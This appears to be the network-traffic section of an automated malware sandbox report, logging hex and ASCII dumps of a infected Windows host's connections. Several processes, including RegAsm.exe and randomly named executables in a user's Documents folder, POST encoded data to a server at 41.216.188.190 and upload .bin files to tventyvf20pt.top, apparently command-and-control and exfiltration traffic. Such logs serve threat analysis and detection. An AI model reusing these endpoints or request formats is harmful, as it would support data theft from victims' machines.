                                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        12192.168.2.949720162.241.61.218807504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:08.973561049 CEST115OUTData Raw: 16 03 01 00 6e 01 00 00 6a 03 01 66 ee c0 87 9d 93 4f 2b 65 1e 98 1c 03 5a de 32 ec 9e 36 09 01 a4 79 9c f4 48 e4 02 cc 91 d4 0d 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 33 00 00 00 10 00 0e 00 00 0b 6e 65 72 76 2e 63 6f 6d 2e
                                                                                                                                                                                                                                        Data Ascii: njfO+eZ26yH5/3nerv.com.pe#
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.455365896 CEST513INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:09 GMT
                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                        Content-Length: 347
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        13192.168.2.949721162.241.61.218807504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.461575985 CEST115OUTData Raw: 16 03 01 00 6e 01 00 00 6a 03 01 66 ee c0 88 a1 d2 94 a9 1a 02 8a 3f e9 c5 c0 0f 04 6e 88 1e df 7c 0d f4 f8 7c 15 b6 0c 79 d2 ba 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 33 00 00 00 10 00 0e 00 00 0b 6e 65 72 76 2e 63 6f 6d 2e
                                                                                                                                                                                                                                        Data Ascii: njf?n||y5/3nerv.com.pe#
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.977042913 CEST513INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:09 GMT
                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                        Content-Length: 347
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        14192.168.2.949723162.241.61.218807504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.472172022 CEST115OUTData Raw: 16 03 01 00 6e 01 00 00 6a 03 01 66 ee c0 88 5a 7d 2c 95 ca e1 e3 1b 3f df 1c ba f3 12 54 24 fb 38 b1 95 b0 ae af 77 b2 47 ed f2 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 33 00 00 00 10 00 0e 00 00 0b 6e 65 72 76 2e 63 6f 6d 2e
                                                                                                                                                                                                                                        Data Ascii: njfZ},?T$8wG5/3nerv.com.pe#
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:09.959917068 CEST513INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:09 GMT
                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                        Content-Length: 347
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 [TRUNCATED]
                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        15192.168.2.94973341.216.188.190807504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:28.078635931 CEST276OUTPOST /api/wp-admin.php HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Content-Length: 561
                                                                                                                                                                                                                                        Host: 41.216.188.190
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:28.078635931 CEST561OUTData Raw: 64 61 74 61 3d 53 63 72 6d 41 52 41 6a 78 67 68 53 38 6c 37 43 45 77 4b 37 4a 71 77 51 6f 76 58 71 6f 77 78 5f 42 69 73 41 67 6d 51 6c 74 33 34 71 68 2d 32 4f 48 69 6a 75 72 62 37 6f 38 48 78 65 63 5f 4b 62 50 32 46 66 6b 4b 48 58 55 37 37 62 61
                                                                                                                                                                                                                                        Data Ascii: data=ScrmARAjxghS8l7CEwK7JqwQovXqowx_BisAgmQlt34qh-2OHijurb7o8Hxec_KbP2FfkKHXU77ba2eIEUapJ3ZLhzvTAZar34hIXFeqftE-tRj1OWSzl9YFs9Tj2s96FE1Zz544WkekNa_1fbF941OSjI8hf8lIxYUzA2QDfqQdubbi7jWQ4ebbSXC-0Z_goyS-2pyfL1AjLS6d-i32yuWHcBb3JzGnsRPm07UKDtrN5c


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        16192.168.2.94973441.216.188.190807504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:29.408023119 CEST276OUTPOST /api/wp-admin.php HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Content-Length: 561
                                                                                                                                                                                                                                        Host: 41.216.188.190
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:29.408051014 CEST561OUTData Raw: 64 61 74 61 3d 78 32 7a 37 41 53 53 58 47 59 34 50 43 66 44 48 49 44 49 57 6b 55 6b 53 52 59 41 4c 46 33 6b 44 4e 6f 62 68 78 45 57 69 53 53 65 46 73 33 35 55 51 6e 50 49 35 44 56 47 70 2d 53 31 75 51 59 44 65 65 56 70 42 55 38 45 42 68 6b 5f 30
                                                                                                                                                                                                                                        Data Ascii: data=x2z7ASSXGY4PCfDHIDIWkUkSRYALF3kDNobhxEWiSSeFs35UQnPI5DVGp-S1uQYDeeVpBU8EBhk_0Aaijiv4T_iKZaapBJV8lxhwxGpjl_RRA0Kj8HJk-JBbdQjoDitq_MPmLAZWfIcYTjBinTWb6oMExDa6QsupoIpHezdkNz6N8HTislK-xg5hakycutQ9x2fmT_Ny20yp-n4QtgPRXobB4XRGsyCElVoAXjU9x01Kvs
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:31.543210983 CEST363INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:30 GMT
                                                                                                                                                                                                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                        Content-Length: 108
                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Data Raw: 49 6c 71 72 78 61 68 30 4d 46 50 62 67 58 56 6c 79 4d 35 61 46 35 6b 56 70 71 4f 4d 74 48 30 68 50 64 52 56 77 68 66 75 70 72 54 44 76 76 76 4c 58 7a 72 72 76 41 34 44 65 63 4a 37 6e 78 56 47 48 7a 62 44 67 49 2f 56 4e 38 4d 75 6c 67 71 53 55 64 2f 78 2b 4b 44 74 62 79 6a 4a 79 42 72 4a 58 67 6d 2b 50 6c 2b 69 42 46 45 3d
                                                                                                                                                                                                                                        Data Ascii: Ilqrxah0MFPbgXVlyM5aF5kVpqOMtH0hPdRVwhfuprTDvvvLXzrrvA4DecJ7nxVGHzbDgI/VN8MulgqSUd/x+KDtbyjJyBrJXgm+Pl+iBFE=


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        17192.168.2.9497395.53.124.195807932C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:41.153350115 CEST335OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----Boundary30195191
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Content-Length: 411
                                                                                                                                                                                                                                        Host: tventyvf20pt.top
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:41.153390884 CEST411OUTData Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 33 30 31 39 35 31 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 56 75 67
                                                                                                                                                                                                                                        Data Ascii: ------Boundary30195191Content-Disposition: form-data; name="file"; filename="Vugepir.bin"Content-Type: application/octet-stream 5]_3H=WlPrTVaYYiG`,k+C@@i}|'1S\"r6ZVF,0;.h|Fh
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:41.407932043 CEST209INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:48:41 GMT
                                                                                                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                        Content-Length: 2
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                        Data Raw: 4f 4b
                                                                                                                                                                                                                                        Data Ascii: OK


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        18192.168.2.94974192.119.114.169803124C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:42.567421913 CEST36INData Raw: ad da ba ab 18 00 00 00 12 27 00 00 1c 3f 3c 3f 0c 3a 41 17 15 3f 15 1a 34 2b 13 4b 13 3c 21 35 32 55 4b 1b
                                                                                                                                                                                                                                        Data Ascii: '?<?:A?4+K<!52UK
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:42.929869890 CEST36INData Raw: ad da ba ab 18 00 00 00 12 27 00 00 1c 3f 3c 3f 0c 3a 41 17 15 3f 15 1a 34 2b 13 4b 13 3c 21 35 32 55 4b 1b
                                                                                                                                                                                                                                        Data Ascii: '?<?:A?4+K<!52UK
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:45.696892023 CEST12OUTData Raw: ad da ba ab 00 00 00 00 10 27 00 00
                                                                                                                                                                                                                                        Data Ascii: '
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:45.866461992 CEST12INData Raw: ad da ba ab 00 00 00 00 11 27 00 00
                                                                                                                                                                                                                                        Data Ascii: '
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:50.702366114 CEST18OUTData Raw: ad da ba ab 06 00 00 00 16 27 00 00 1a 15 10 1c 17 0d
                                                                                                                                                                                                                                        Data Ascii: '
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:50.884762049 CEST76INData Raw: ad da ba ab 40 00 00 00 17 27 00 00 1b 48 4c 1b 1d 1b 49 18 4d 1d 4e 1f 4b 4f 4c 1a 1f 4d 1c 1d 4e 1a 4d 4f 4f 4f 41 1f 4d 1a 18 4b 4d 4e 4a 4d 4e 1a 18 4b 1a 1c 4d 18 4e 4f 41 40 1a 1b 41 1d 1b 1b 4b 4c 41 4f 4a 1f 4b 40 4d 18
                                                                                                                                                                                                                                        Data Ascii: @'HLIMNKOLMNMOOOAMKMNJMNKMNOA@AKLAOJK@M
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:51.068799973 CEST18OUTData Raw: ad da ba ab 06 00 00 00 18 27 00 00 1a 15 10 1c 17 0d
                                                                                                                                                                                                                                        Data Ascii: '
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:51.316659927 CEST14INData Raw: ad da ba ab 02 00 00 00 13 27 00 00 4f 49
                                                                                                                                                                                                                                        Data Ascii: 'OI
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:51.351557016 CEST1236INData Raw: ad da ba ab 54 36 0e 00 19 27 00 00 0a a3 95 84 0e 39 6a b2 8e 47 f7 b6 17 31 3b 96 2c d0 5b f1 f9 0d 69 2d ed d3 f9 4d 50 5b 73 33 f9 79 e8 6b 35 7b f3 27 6c 95 84 a3 6c 42 0f 95 c4 6e c9 8e a7 c8 d9 a1 6c 02 c2 af 96 e0 b0 fd ff d9 8e c7 07 96
                                                                                                                                                                                                                                        Data Ascii: T6'9jG1;,[i-MP[s3yk5{'llBnlFU$([w;1|;nr9m(k=+;A"[imm;0(C]_C&P+t<Q+<M8;hqJrLa4?1pFE=v{?Z2*N
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:51.351574898 CEST224INData Raw: 7c 32 02 9b 21 30 33 2b eb f4 f6 86 27 33 bb 83 74 47 ba f8 ca 72 5d 34 1f 1f 30 58 60 9a b1 f4 42 df 51 70 6a 08 d3 a5 48 ba 28 15 99 41 cc 47 de da c9 4a 1b 30 4b e9 ec a8 95 b6 60 b4 31 b5 47 34 42 df c9 2c 5f 1a 32 65 dc 54 b7 0a d3 10 3f ff
                                                                                                                                                                                                                                        Data Ascii: |2!03+'3tGr]40X`BQpjH(AGJ0K`1G4B,_2eT?0K?SKSBQoAB?0K#@Zm`d*=:?RevMZ]!`h2Tm`d*=:?be\iMZ]B `h2Tl`d*=:?"e\eMZ] `h2P3Xdz


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        19192.168.2.9497555.53.124.195807932C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:55.401519060 CEST337OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----Boundary80468628
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Content-Length: 87204
                                                                                                                                                                                                                                        Host: tventyvf20pt.top
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:55.401624918 CEST11124OUTData Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 30 34 36 38 36 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 75 68
                                                                                                                                                                                                                                        Data Ascii: ------Boundary80468628Content-Disposition: form-data; name="file"; filename="Zuhejace.bin"Content-Type: application/octet-streamf7p"bSp(whbo_o*KT9k|C .zfnN);_c
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:55.406508923 CEST1236OUTData Raw: da 0e 12 f9 73 4b 4a 2b cc 63 12 12 11 5b e2 c9 8a de 02 80 3b 5c e2 2c 71 08 99 58 b5 f1 3d 68 f0 f0 4b 8c fb 0e 10 9c bc 45 66 1d ba 48 2b d3 be a1 79 48 34 3f 5a a8 c0 08 aa 56 dd ef ff 58 39 27 7c 55 5b 4f cd 58 61 22 60 9b 61 75 c4 ec 49 fc
                                                                                                                                                                                                                                        Data Ascii: sKJ+c[;\,qX=hKEfH+yH4?ZVX9'|U[OXa"`auId[DX<QR-{-BW;;+,K@~r\XlzPm5M F1dgoFL29Ahn[)S)cMx
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:55.406585932 CEST7416OUTData Raw: df 4d bf 59 bb 35 08 f9 e1 cf be c6 bf 73 16 2e bb 25 b2 27 ff 55 f7 b8 c4 55 b3 e3 24 3a 9f 55 5e be 09 0b c4 16 9c de b2 fb 5d e8 2d 34 40 c7 16 12 6d 4d 23 26 53 7a 3d 0d db ae 5c f7 53 0c 1a 69 b7 08 4e e8 89 26 70 03 81 80 8b 23 e1 21 0b 01
                                                                                                                                                                                                                                        Data Ascii: MY5s.%'UU$:U^]-4@mM#&Sz=\SiN&p#!D.49|B2@{;w'&J;Tz8gQZ/l)l -:=(]T9}>H&`$W6B{aHl'SoG/UeO )Wr
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:55.406609058 CEST2472OUTData Raw: 94 1a 09 b1 06 b2 1f 91 9c 40 db 27 e9 6b 1f 9b 05 2d e4 34 62 ac 39 aa 4a 02 fa a9 fc 99 92 bf d6 cf 74 e7 13 ca 34 48 23 2f 9a d0 a4 52 8e 6e 29 bb 03 bd 2b f7 fd 9e cd 4d 76 88 ec 77 64 b5 35 86 1f 96 55 8c 2f 34 0b de 67 4b 25 0c d5 06 19 fa
                                                                                                                                                                                                                                        Data Ascii: @'k-4b9Jt4H#/Rn)+Mvwd5U/4gK%iDfFl){q]~Y8*2/^@{$SmRiE0^{(}=VWqSkW=u*@ 7<JJ3Q*]>"_*Zo@(
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:55.406660080 CEST2472OUTData Raw: d1 e9 82 6c f0 7a 0f 97 27 a7 c7 59 53 0d bd 83 e2 9b ef 61 85 f7 d8 ae 41 ce 7d 42 f5 ec 59 74 99 81 db 8c 45 a8 f8 f8 74 24 41 cb 91 7e 48 0e 11 39 8e 55 3d 8e ee b9 1c 4e 86 61 b4 0a 34 a9 59 3d b8 17 ee 4e 9f a1 a7 9d d8 98 a1 d8 f9 f7 00 a6
                                                                                                                                                                                                                                        Data Ascii: lz'YSaA}BYtEt$A~H9U=Na4Y=NY0N;&"O+:h!<`QG\]'iprfv,:Bb4}cIr*egVLyl)aY#n&f6H>#P/V(SDDP8->qB^SO
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:55.406706095 CEST4944OUTData Raw: 30 ba a6 dd 34 07 ec 30 d8 35 9e 62 43 21 df 07 11 18 8c 72 34 00 d7 1d 62 f1 fc f9 b0 59 f2 ee 40 4b ca b6 bd 95 b2 62 f1 ec 02 d9 a6 4d f4 a0 4d 52 57 8b 7a 02 62 cc 58 4a 10 4c 0d 5c 58 e3 35 47 ce 65 9d d7 5d 67 0a 4c a0 3b 44 0e d5 4d f2 81
                                                                                                                                                                                                                                        Data Ascii: 0405bC!r4bY@KbMMRWzbXJL\X5Ge]gL;DMZ5fr$+vQz0kh=DA>{,;*6wYG.`q4x]u|ChW0x|,N|^B9}gVsLS)x_a0@NC:iH.{Y
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:55.406729937 CEST2472OUTData Raw: 37 b5 5f 77 e3 4a d3 ff f7 e8 46 ca 20 18 30 41 f9 e2 0e bd 87 78 af 62 8c 8b f0 c8 76 d6 fc 59 9e 82 92 c5 be 13 c7 e8 aa 3b 26 b2 d0 7f 58 ef 24 3e fc 4f 77 04 5f e8 12 9e 5d 9f 35 f4 13 7e 64 b5 13 19 b6 74 f8 99 e2 be c2 44 90 e1 fe 3d 15 dd
                                                                                                                                                                                                                                        Data Ascii: 7_wJF 0AxbvY;&X$>Ow_]5~dtD=m"E:vP.n}c^PCAH2xrwxIddf5KSFK"Wk[[yAd#l~gt]FgGqd\\^Z?bA4_y-`Rgop n0vB7ZBW?-
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:55.411055088 CEST2472OUTData Raw: 3e 67 52 6c cd 35 fd bb a6 19 d0 da 1c c3 12 c4 36 d3 79 f1 44 a9 ea 66 3d ac 32 0f 76 72 b7 e2 dd 7d 98 87 42 d9 45 7f 4f eb 89 ae 94 37 73 c9 42 2b d3 20 93 8a 05 fc c4 92 76 b2 7b 9f ae 70 4a be f5 7c ac ed ab 6e a6 f1 cb 1b a0 2f 2e 45 56 c1
                                                                                                                                                                                                                                        Data Ascii: >gRl56yDf=2vr}BEO7sB+ v{pJ|n/.EV$Fb*CxsVm1@Mu#?[ShIrR)WxZ,cbp5\]$~rTUcmw<wPTAVkUw=1=oDShVyfW0g
